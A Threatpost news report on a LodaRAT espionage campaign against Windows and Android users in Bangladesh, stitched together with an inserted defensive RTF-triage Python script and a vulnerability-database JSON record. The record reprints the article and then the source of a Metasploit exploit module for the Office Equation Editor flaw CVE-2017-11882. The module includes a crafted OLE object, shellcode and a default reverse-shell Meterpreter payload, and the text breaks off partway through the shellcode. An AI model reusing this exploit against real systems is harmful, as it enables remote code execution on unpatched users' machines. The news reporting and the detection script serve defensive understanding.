Android Devices Hunted by LodaRAT Windows Malware
Threatpost (ID THREATPOST:639050E94B84AD3926F64EF305F67AB4), reporter Lindsey O'Donnell, modified 2021-02-09T15:47:03
A newly discovered variant of the LodaRAT malware, which has historically targeted Windows devices, is being distributed in an ongoing campaign that now also hunts down Android devices and spies on victims.
Along with this, an updated version of LodaRAT for Windows has also been identified; both versions were seen in a recent campaign targeting Bangladesh, researchers said.
The campaign reflects an overarching shift in strategy for LodaRAT’s developers, as the attack appears to be driven by espionage rather than its previous financial goals. While previous versions of LodaRAT contained credential-stealing capabilities that researchers speculated were used for draining victims’ bank accounts, these newer versions come with a full roundup of information-gathering commands.
“The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,” said researchers with Cisco Talos, on Tuesday. “Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.”
What is the LodaRAT Malware?
LodaRAT, first discovered in September 2016, is a remote access trojan (RAT) that comes with a variety of capabilities for spying on victims, such as recording the microphones and webcams of victims’ devices. The name “Loda” is derived from a directory to which the malware author chose to write keylogger logs.
Since its discovery in 2016, the RAT has proliferated, with multiple new versions spotted in the wild as recently as September. The RAT, which is written in AutoIt, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.
Recent LodaRAT Cyberattack in Bangladesh
Researchers observed a campaign involving LodaRAT that began in October and is still active. The attackers appear to have a specific interest in Bangladesh-based organizations, including banks and carrier-grade voice-over-IP (VoIP) software vendors.
Vitor Ventura, Cisco Talos’ technical lead and senior security researcher, told Threatpost that the initial attack vectors for the campaign involved emails sent to victims with links to malicious applications (involving both the Windows and Android versions) or malicious documents (involving just the Windows version).
“The campaign uncovered targeting Bangladesh used different levels of lures, from typosquatted domains to file names directly linked to products or services of their victims,” said researchers.
For the Windows-targeting maldoc attack, the victim is lured into opening a malicious RTF document; the document exploits CVE-2017-11882 (a remote code-execution vulnerability in Microsoft Office) and then downloads LodaRAT.
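As an added defender-side example (not code from the article or from Cisco Talos), the following Python script triages an RTF attachment for the delivery pattern described above: an embedded OLE object whose class is the Equation Editor component patched in CVE-2017-11882, combined with the \objupdate flag that makes Word load the object as soon as the file is opened. The two sample RTFs are constructed inline and contain no exploit; the marker strings are the class and stream names such objects carry.

```python
"""Triage RTF files for an embedded Equation Editor object (CVE-2017-11882 delivery)."""
import binascii
import re

# Class name and OLE storage/stream names that identify an Equation Editor
# (EQNEDT32.EXE) object, the component patched for CVE-2017-11882.
EQUATION_MARKERS = (b"Equation.3", b"Equation Native", b"Microsoft Equation 3.0")

# {\*\objclass <name>} names the embedded object's class; {\*\objdata <hex>}
# carries the serialised OLE object as a hex string (whitespace allowed).
OBJCLASS_RE = re.compile(rb"\\\*\\objclass\s+([A-Za-z0-9.]+)")
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
NON_HEX_RE = re.compile(rb"[^0-9A-Fa-f]")


def decode_objdata(hex_blob):
    """Turn the hex text of an \\objdata group back into raw bytes."""
    cleaned = NON_HEX_RE.sub(b"", hex_blob)
    if len(cleaned) % 2:          # tolerate a truncated trailing nibble
        cleaned = cleaned[:-1]
    return binascii.unhexlify(cleaned)


def triage_rtf(rtf_bytes):
    """Return a list of findings (empty list means nothing suspicious was seen)."""
    findings = []
    # 1. Declared object class: Equation.* means the Equation Editor is the host.
    for m in OBJCLASS_RE.finditer(rtf_bytes):
        cls = m.group(1)
        if cls.lower().startswith(b"equation"):
            findings.append("objclass:" + cls.decode("ascii"))
    # 2. Object payload: OLE stream names are UTF-16LE, program names ASCII,
    #    so check both encodings. This catches objects with a disguised class.
    for m in OBJDATA_RE.finditer(rtf_bytes):
        blob = decode_objdata(m.group(1))
        for marker in EQUATION_MARKERS:
            if marker in blob or marker.decode("ascii").encode("utf-16-le") in blob:
                findings.append("objdata:" + marker.decode("ascii"))
    # 3. \objupdate forces the object to be loaded (and the vulnerable editor
    #    started) on open, without the user double-clicking it.
    if b"\\objupdate" in rtf_bytes:
        findings.append("objupdate")
    return findings


def verdict(findings):
    """Collapse findings into a triage level for an analyst or mail gateway."""
    has_equation = any(f.startswith(("objclass:", "objdata:")) for f in findings)
    if has_equation and "objupdate" in findings:
        return "high"
    if has_equation:
        return "medium"
    return "low"


def build_sample_rtf(class_name, object_bytes, auto_update):
    """Constructed sample RTF with one embedded object (not a real OLE container)."""
    flags = b"\\objupdate" if auto_update else b""
    body = (b"{\\object\\objemb" + flags
            + b"{\\*\\objclass " + class_name + b"}"
            + b"{\\*\\objdata " + binascii.hexlify(object_bytes) + b"}}")
    return b"{\\rtf1\\ansi " + body + b"\\par}"


# Constructed sample: an Equation Editor object whose data carries the stream
# name (UTF-16LE) and program name (ASCII) found in such objects. No exploit.
SUSPECT_OBJECT = (b"\x01\x05\x00\x00\x02\x00\x00\x00"
                  + "Equation Native".encode("utf-16-le")
                  + b"\x00\x00Microsoft Equation 3.0\x00")
SUSPECT_RTF = build_sample_rtf(b"Equation.3", SUSPECT_OBJECT, auto_update=True)

# Constructed sample: an ordinary embedded spreadsheet object.
BENIGN_RTF = build_sample_rtf(b"Excel.Sheet.12",
                              b"\xd0\xcf\x11\xe0" + b"\x00" * 16, auto_update=False)

if __name__ == "__main__":
    for name, doc in (("suspect.rtf", SUSPECT_RTF), ("benign.rtf", BENIGN_RTF)):
        found = triage_rtf(doc)
        print(f"{name}: {verdict(found)} {found}")
```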
LodaRAT’s New Android Variant
The Android version of the LodaRAT malware, which researchers call “Loda4Android,” is “relatively simple when compared to other Android malware,” said researchers. For instance, the RAT has specifically avoided techniques often used by Android banking trojans, such as leveraging the Accessibility APIs, in order to steal data.
The underlying command-and-control (C2) protocol follows the same design pattern as the Windows version, said researchers – suggesting that the C2 code will be able to handle both versions.
Also, Loda4Android has “all the components of a stalker application,” said researchers. The malware collects location data and records audio, and can take photos and screenshots.
“It can record audio calls, but it will only record what the victim says, not what the counterpart says,” said researchers. “The common SMS, call log and contact exfiltration functionalities are also present. It is interesting to note that it’s not capable of intercepting the SMS or the calls, like it’s usually seen in banker trojans.”
Fresh Windows Loda Version
The new version of the LodaRAT that targets Windows systems is version 1.1.8. While it’s mostly the same as previous versions, new commands have been added that extend its capabilities.
For one, the version comes with new commands that give the threat actor remote access to the target machine via the Remote Desktop Protocol (RDP). The new version can now leverage the BASS audio library to capture audio from a connected microphone. BASS is used in Win32, macOS, Linux and PocketPC software to provide streaming and recording functions for music.
“This new command is an improvement on the previous ‘Sound’ command which used Windows’ built-in Sound Recorder,” said researchers. “The reason for abandoning the previous method is likely because Windows Sound Recorder can only record audio for a maximum of 60 seconds. The new method allows for any length of recording time specified by the threat actor.”
{"id": "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "type": "threatpost", "bulletinFamily": "info", "title": "Android Devices Hunted by LodaRAT Windows Malware", "description": "A newly discovered variant of the LodaRAT malware, which has historically targeted Windows devices, is being distributed in an ongoing campaign that now also hunts down Android devices and spies on victims.\n\nAlong with this, an updated version of LodaRAT for Windows has also been identified; both versions were seen in a recent campaign targeting Bangladesh, researchers said.\n\nThe campaign reflects an overarching shift in strategy for LodaRAT\u2019s developers, as the attack appears to be driven by espionage rather than its previous financial goals. While previous versions of LodaRAT contained credential-stealing capabilities that researchers speculated were used for draining victims\u2019 bank accounts, these newer versions come with a full roundup of information-gathering commands.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\u201d said researchers with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>). \u201cAlong with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\u201d\n\n## **What is the LodaRAT Malware?**\n\nLodaRAT, [first discovered](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>) in September 2016, is a remote access trojan (RAT) that comes with a variety of capabilities for spying on victims, such as recording the microphones and webcams of victims\u2019 devices. 
The name \u201cLoda\u201d is derived from a directory to which the malware author chose to write keylogger logs.\n\nSince its discovery in 2016 the RAT has proliferated, with multiple new versions being spotted in the wild [as recently as September](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>). The RAT, which is written in AutoIT, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.\n\n## **Recent LodaRAT Cyberattack in Bangladesh**\n\nResearchers observed a campaign involving LodaRAT that began in October and is still active. The attackers appear to have a specific interest in Bangladesh-based organizations, including banks and carrier-grade voice-over-IP (VoIP) software vendors.\n\nVitor Ventura, Cisco Talos\u2019 technical lead and senior security researcher, told Threatpost that the initial attack vectors for the campaign involved emails sent to victims with links to malicious applications (involving both the Windows and Android versions) or malicious documents (involving just the Windows version).\n\n\u201cThe campaign uncovered targeting Bangladesh used different levels of lures, from type squatted domains, to file names directly linked to products or services of their victims,\u201d said researchers.\n\nFor the Windows-targeting maldoc attack, after the victim clicked on the malicious documents, attackers used a malicious RTF document, which exploits CVE-2017-11882 ([a remote code-execution vulnerability](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) existing in Microsoft Office) in order to then download LodaRAT.\n\n## **LodaRAT\u2019s New Android Variant **\n\nThe Android version of the LodaRAT malware, which researchers call \u201cLoda4Android,\u201d is \u201crelatively simple when compared to other Android malware,\u201d said researchers. 
For instance, the RAT has specifically avoided techniques often used by Android banking trojans, such as [leveraging the Accessibility APIs,](<https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/>) in order to steal data.\n\nThe underlying command-and-control (C2) protocol follows the same design pattern as the Windows version, said researchers \u2013 suggesting that the C2 code will be able to handle both versions.\n\nAlso, Loda4Android has \u201call the components of a stalker application\u201d said researchers. The malware collects location data and records audio, and can take photos and screenshots.\n\n\u201cIt can record audio calls, but it will only record what the victim says but not what the counterpart says,\u201d said researchers. \u201cThe common SMS, call log and contact exfiltration functionalities are also present. It is interesting to note that it\u2019s not capable of intercepting the SMS or the calls, like it\u2019s usually seen in banker trojans.\u201d\n\n## **Fresh Windows Loda Version**\n\nThe new version of the LodaRAT that targets Windows systems is version 1.1.8. While it\u2019s mostly the same as previous versions, new commands have been added that extend its capabilities.\n\nFor one, the version comes with new commands that give the threat actor remote access to the target machine via [the Remote Desktop Protocol](<https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/>) (RDP). The new version can now leverage the BASS audio library to capture audio from a connected microphone. BASS is used in Win32, macOS, Linux and PocketPC software to provide streaming and recording functions for music.\n\n\u201cThis new command is an improvement on the previous \u2018Sound\u2019 command which used Windows\u2019 built in Sound Recorder,\u201d said researchers. 
\u201cThe reason for abandoning the previous method is likely because Windows Sound Recorder can only record audio for a maximum of 60 seconds. The new method allows for any length of recording time specified by the threat actor.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "published": "2021-02-09T15:47:03", "modified": "2021-02-09T15:47:03", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/android-devices-lodarat-windows/163769/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/newsletter-sign/", "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/", "https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/", "https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook", 
"https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook"], "cvelist": ["CVE-2017-11882"], "lastseen": "2021-02-09T19:52:36", "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201891962"]}, {"type": "threatpost", "idList": ["THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:404B86130415376C2173D576AAD37DC8", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:63CE702F4E603943CC93B9603382C660", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148"]}, {"type": "cert", "idList": ["VU:421280"]}], "modified": "2021-02-09T19:52:36", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-02-09T19:52:36", "rev": 2}, "vulnersScore": 5.9}, "immutableFields": []}
{"cve": [{"lastseen": "2021-03-17T14:01:35", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-03-16T17:21:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-03-17T06:34:05", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2021-03-17T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. 
The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = 
retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << 
'0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << 
'0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << 
